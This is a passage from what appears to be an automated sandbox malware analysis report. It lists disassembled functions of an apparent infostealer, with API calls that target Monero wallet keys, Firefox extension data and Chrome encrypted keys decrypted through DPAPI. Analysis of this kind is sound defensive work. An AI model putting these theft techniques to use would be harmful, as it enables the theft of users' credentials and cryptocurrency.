                                    • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Heap$AllocateProcesswsprintf
                                    • String ID: %hs
                                    • API String ID: 769748085-2783943728
                                    • Opcode ID: efda7f8f22d5ad009a0988b0acf966e161a7704669c5f96e321c136ba586c166
                                    • Instruction ID: bcd497ebeed3984ed4c0989f3dcd5a8fc6f3fa64a96e2cd9e128d7e710647774
                                    • Opcode Fuzzy Hash: efda7f8f22d5ad009a0988b0acf966e161a7704669c5f96e321c136ba586c166
                                    • Instruction Fuzzy Hash: F6E0B675A58309BBDB10DBD5ED0AA6DB7A8EB05702F000194FD0A96240DA719F10AB95
                                    Function 0068A990 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0069AA50: lstrcpy.KERNEL32(006A0E1A,00000000), ref: 0069AA98
                                      • Part of subcall function 0069ACC0: lstrlen.KERNEL32(?,01428E68,?,\Monero\wallet.keys,006A0E1A), ref: 0069ACD5
                                      • Part of subcall function 0069ACC0: lstrcpy.KERNEL32(00000000), ref: 0069AD14
                                      • Part of subcall function 0069ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0069AD22
                                      • Part of subcall function 0069ABB0: lstrcpy.KERNEL32(?,006A0E1A), ref: 0069AC15
                                      • Part of subcall function 00698CF0: GetSystemTime.KERNEL32(006A0E1B,0142E6D0,006A05B6,?,?,006813F9,?,0000001A,006A0E1B,00000000,?,01428E68,?,\Monero\wallet.keys,006A0E1A), ref: 00698D16
                                      • Part of subcall function 0069AC30: lstrcpy.KERNEL32(00000000,?), ref: 0069AC82
                                      • Part of subcall function 0069AC30: lstrcat.KERNEL32(00000000), ref: 0069AC92
                                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0068AA11
                                    • lstrlen.KERNEL32(00000000,00000000), ref: 0068AB2F
                                    • lstrlen.KERNEL32(00000000), ref: 0068ADEC
                                      • Part of subcall function 0069AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0069AAF6
                                    • DeleteFileA.KERNEL32(00000000), ref: 0068AE73
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                    • String ID:
                                    • API String ID: 211194620-0
                                    • Opcode ID: 78eb01bbab1cf79d794b8ddbbd831bd6cff66229e91770503a454f0be5d9f134
                                    • Instruction ID: 29abed3b5d32123596ee9c7946a5318bc07d07a6c619b60b4b13ff97b135d8d9
                                    • Opcode Fuzzy Hash: 78eb01bbab1cf79d794b8ddbbd831bd6cff66229e91770503a454f0be5d9f134
                                    • Instruction Fuzzy Hash: 9CE1DD729141089BCF44FBE4DDA2EEEB37EAF14300F50855DF11676495EE306A48CBAA
                                    Function 0068D500 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0069AA50: lstrcpy.KERNEL32(006A0E1A,00000000), ref: 0069AA98
                                      • Part of subcall function 0069ACC0: lstrlen.KERNEL32(?,01428E68,?,\Monero\wallet.keys,006A0E1A), ref: 0069ACD5
                                      • Part of subcall function 0069ACC0: lstrcpy.KERNEL32(00000000), ref: 0069AD14
                                      • Part of subcall function 0069ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0069AD22
                                      • Part of subcall function 0069ABB0: lstrcpy.KERNEL32(?,006A0E1A), ref: 0069AC15
                                      • Part of subcall function 00698CF0: GetSystemTime.KERNEL32(006A0E1B,0142E6D0,006A05B6,?,?,006813F9,?,0000001A,006A0E1B,00000000,?,01428E68,?,\Monero\wallet.keys,006A0E1A), ref: 00698D16
                                      • Part of subcall function 0069AC30: lstrcpy.KERNEL32(00000000,?), ref: 0069AC82
                                      • Part of subcall function 0069AC30: lstrcat.KERNEL32(00000000), ref: 0069AC92
                                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0068D581
                                    • lstrlen.KERNEL32(00000000), ref: 0068D798
                                    • lstrlen.KERNEL32(00000000), ref: 0068D7AC
                                    • DeleteFileA.KERNEL32(00000000), ref: 0068D82B
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                    • String ID:
                                    • API String ID: 211194620-0
                                    • Opcode ID: 4f74a326c76fcb206e31ea3c2422f52b772a62d7a98e054a85daef8efaa41c50
                                    • Instruction ID: cba32e298ec7f1c5dffc27f01206949e4ae59abeba28062bfa4701a3a32001da
                                    • Opcode Fuzzy Hash: 4f74a326c76fcb206e31ea3c2422f52b772a62d7a98e054a85daef8efaa41c50
                                    • Instruction Fuzzy Hash: 6A91DC729141089BCF44FBE4DDA2DEEB3BEAF54301F50456CF11666495EF306A08CBAA
                                    Function 0068D880 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0069AA50: lstrcpy.KERNEL32(006A0E1A,00000000), ref: 0069AA98
                                      • Part of subcall function 0069ACC0: lstrlen.KERNEL32(?,01428E68,?,\Monero\wallet.keys,006A0E1A), ref: 0069ACD5
                                      • Part of subcall function 0069ACC0: lstrcpy.KERNEL32(00000000), ref: 0069AD14
                                      • Part of subcall function 0069ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0069AD22
                                      • Part of subcall function 0069ABB0: lstrcpy.KERNEL32(?,006A0E1A), ref: 0069AC15
                                      • Part of subcall function 00698CF0: GetSystemTime.KERNEL32(006A0E1B,0142E6D0,006A05B6,?,?,006813F9,?,0000001A,006A0E1B,00000000,?,01428E68,?,\Monero\wallet.keys,006A0E1A), ref: 00698D16
                                      • Part of subcall function 0069AC30: lstrcpy.KERNEL32(00000000,?), ref: 0069AC82
                                      • Part of subcall function 0069AC30: lstrcat.KERNEL32(00000000), ref: 0069AC92
                                    • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0068D901
                                    • lstrlen.KERNEL32(00000000), ref: 0068DA9F
                                    • lstrlen.KERNEL32(00000000), ref: 0068DAB3
                                    • DeleteFileA.KERNEL32(00000000), ref: 0068DB32
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                    • String ID:
                                    • API String ID: 211194620-0
                                    • Opcode ID: 17994a53089d034f34b5c9bbcbcd9bc14708c2b4933d50affe48776e000f8dcd
                                    • Instruction ID: f3c5fef3092250f5e8eb41210bb847bdec5119628473cc7398b9fda18697669f
                                    • Opcode Fuzzy Hash: 17994a53089d034f34b5c9bbcbcd9bc14708c2b4933d50affe48776e000f8dcd
                                    • Instruction Fuzzy Hash: 6981DC729141089BCF44FBE4DCA6DFEB3BEAF54301F50455CF11666495EE306A08CBAA
                                    Function 006FFED7 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AdjustPointer
                                    • String ID:
                                    • API String ID: 1740715915-0
                                    • Opcode ID: 06145f3a63d5280db2389d3658a688964ecb7b0d80857c6917ca60528e3905ca
                                    • Instruction ID: c8588c8953d0d1e5558c6fcb2d96ba70e369ac22589271ff91df1d44bac8740a
                                    • Opcode Fuzzy Hash: 06145f3a63d5280db2389d3658a688964ecb7b0d80857c6917ca60528e3905ca
                                    • Instruction Fuzzy Hash: A451B07260220AEFEB298F54C841BBA77A6FF41320F24463DEA0597691E735ED40DB90
                                    Function 0068A560 Relevance: 6.2, APIs: 1, Strings: 3, Instructions: 158memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • LocalAlloc.KERNEL32(00000040,?), ref: 0068A664
                                      • Part of subcall function 0069AA50: lstrcpy.KERNEL32(006A0E1A,00000000), ref: 0069AA98
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AllocLocallstrcpy
                                    • String ID: @$v10$v20
                                    • API String ID: 2746078483-278772428
                                    • Opcode ID: 9c0982253ada5ae673a9dcda6a2ff7d7730eaf1e2a671808ab3f75c0ab1356e4
                                    • Instruction ID: 1c6be4ff989e7bde6fb9c7f9058986896805d216fd7dd02e52672360124179ca
                                    • Opcode Fuzzy Hash: 9c0982253ada5ae673a9dcda6a2ff7d7730eaf1e2a671808ab3f75c0ab1356e4
                                    • Instruction Fuzzy Hash: FF513E74A10208DFDF14EFA4CD96BED77BAAF41340F008218E90A5F691EB706A45CB96
                                    Function 0068F5A0 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 154stringCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0069AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0069AAF6
                                      • Part of subcall function 0068A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0068A13C
                                      • Part of subcall function 0068A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 0068A161
                                      • Part of subcall function 0068A110: LocalAlloc.KERNEL32(00000040,?), ref: 0068A181
                                      • Part of subcall function 0068A110: ReadFile.KERNEL32(000000FF,?,00000000,0068148F,00000000), ref: 0068A1AA
                                      • Part of subcall function 0068A110: LocalFree.KERNEL32(0068148F), ref: 0068A1E0
                                      • Part of subcall function 0068A110: CloseHandle.KERNEL32(000000FF), ref: 0068A1EA
                                      • Part of subcall function 00698FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00698FE2
                                      • Part of subcall function 0069AA50: lstrcpy.KERNEL32(006A0E1A,00000000), ref: 0069AA98
                                      • Part of subcall function 0069ACC0: lstrlen.KERNEL32(?,01428E68,?,\Monero\wallet.keys,006A0E1A), ref: 0069ACD5
                                      • Part of subcall function 0069ACC0: lstrcpy.KERNEL32(00000000), ref: 0069AD14
                                      • Part of subcall function 0069ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 0069AD22
                                      • Part of subcall function 0069ABB0: lstrcpy.KERNEL32(?,006A0E1A), ref: 0069AC15
                                      • Part of subcall function 0069AC30: lstrcpy.KERNEL32(00000000,?), ref: 0069AC82
                                      • Part of subcall function 0069AC30: lstrcat.KERNEL32(00000000), ref: 0069AC92
                                    • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,006A1678,006A0D93), ref: 0068F64C
                                    • lstrlen.KERNEL32(00000000), ref: 0068F66B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                                    • String ID: ^userContextId=4294967295$moz-extension+++
                                    • API String ID: 998311485-3310892237
                                    • Opcode ID: eec3afe3637bdf394827bad50078db7f0282443536b08d4c32e51963216f2d8a
                                    • Instruction ID: e45c7c498b1c4fc4fe045c74e085c6fc9876fb6f7973e2e18b600e4edbea3dc6
                                    • Opcode Fuzzy Hash: eec3afe3637bdf394827bad50078db7f0282443536b08d4c32e51963216f2d8a
                                    • Instruction Fuzzy Hash: 3051FA729101089BCF44FBE4DDA29FD73BEAF54300F40866CF41667595EE346A08CBAA
                                    Function 006937B0 Relevance: 6.1, APIs: 4, Instructions: 124COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: lstrcpy$lstrlen
                                    • String ID:
                                    • API String ID: 367037083-0
                                    • Opcode ID: 0f0ff051e71fc2873ed1991fd7c8d0e0909aabb2748ae5df875931456fe19f71
                                    • Instruction ID: b7a4e9963502d35518ad3a68f1d48a3c655fa9e608698738157e7c7c46b5d7aa
                                    • Opcode Fuzzy Hash: 0f0ff051e71fc2873ed1991fd7c8d0e0909aabb2748ae5df875931456fe19f71
                                    • Instruction Fuzzy Hash: FE410871D14209ABDF04EFE4D955AEEB7BEAF44304F008018F516B6690EB70AA05CFA6
                                    Function 0068A430 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 98COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0069AA50: lstrcpy.KERNEL32(006A0E1A,00000000), ref: 0069AA98
                                      • Part of subcall function 0068A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0068A13C
                                      • Part of subcall function 0068A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 0068A161
                                      • Part of subcall function 0068A110: LocalAlloc.KERNEL32(00000040,?), ref: 0068A181
                                      • Part of subcall function 0068A110: ReadFile.KERNEL32(000000FF,?,00000000,0068148F,00000000), ref: 0068A1AA
                                      • Part of subcall function 0068A110: LocalFree.KERNEL32(0068148F), ref: 0068A1E0
                                      • Part of subcall function 0068A110: CloseHandle.KERNEL32(000000FF), ref: 0068A1EA
                                      • Part of subcall function 00698FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00698FE2
                                    • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 0068A489
                                      • Part of subcall function 0068A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>Oh,00000000,00000000), ref: 0068A23F
                                      • Part of subcall function 0068A210: LocalAlloc.KERNEL32(00000040,?,?,?,00684F3E,00000000,?), ref: 0068A251
                                      • Part of subcall function 0068A210: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,>Oh,00000000,00000000), ref: 0068A27A
                                      • Part of subcall function 0068A210: LocalFree.KERNEL32(?,?,?,?,00684F3E,00000000,?), ref: 0068A28F
                                      • Part of subcall function 0068A2B0: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 0068A2D4
                                      • Part of subcall function 0068A2B0: LocalAlloc.KERNEL32(00000040,00000000), ref: 0068A2F3
                                      • Part of subcall function 0068A2B0: LocalFree.KERNEL32(?), ref: 0068A323
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2131939068.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                    • Associated: 00000000.00000002.2131924572.0000000000680000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000006AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.00000000007EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2131939068.0000000000956000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.000000000096A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000AF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BEE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000BF6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132139185.0000000000C06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132381993.0000000000C07000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132485547.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2132499957.0000000000DA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_680000_file.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                                    • String ID: $"encrypted_key":"$DPAPI
                                    • API String ID: 2100535398-738592651
                                    • Opcode ID: 2456b86fef27d82f0c78150734f7cc14c86a3e859031127ce66aebc22a0fa345
                                    • Instruction ID: 340426e123131ee2c53743f1373afc8c660c8466b0fb6c021f6c08c7176a798e
                                    • Opcode Fuzzy Hash: 2456b86fef27d82f0c78150734f7cc14c86a3e859031127ce66aebc22a0fa345
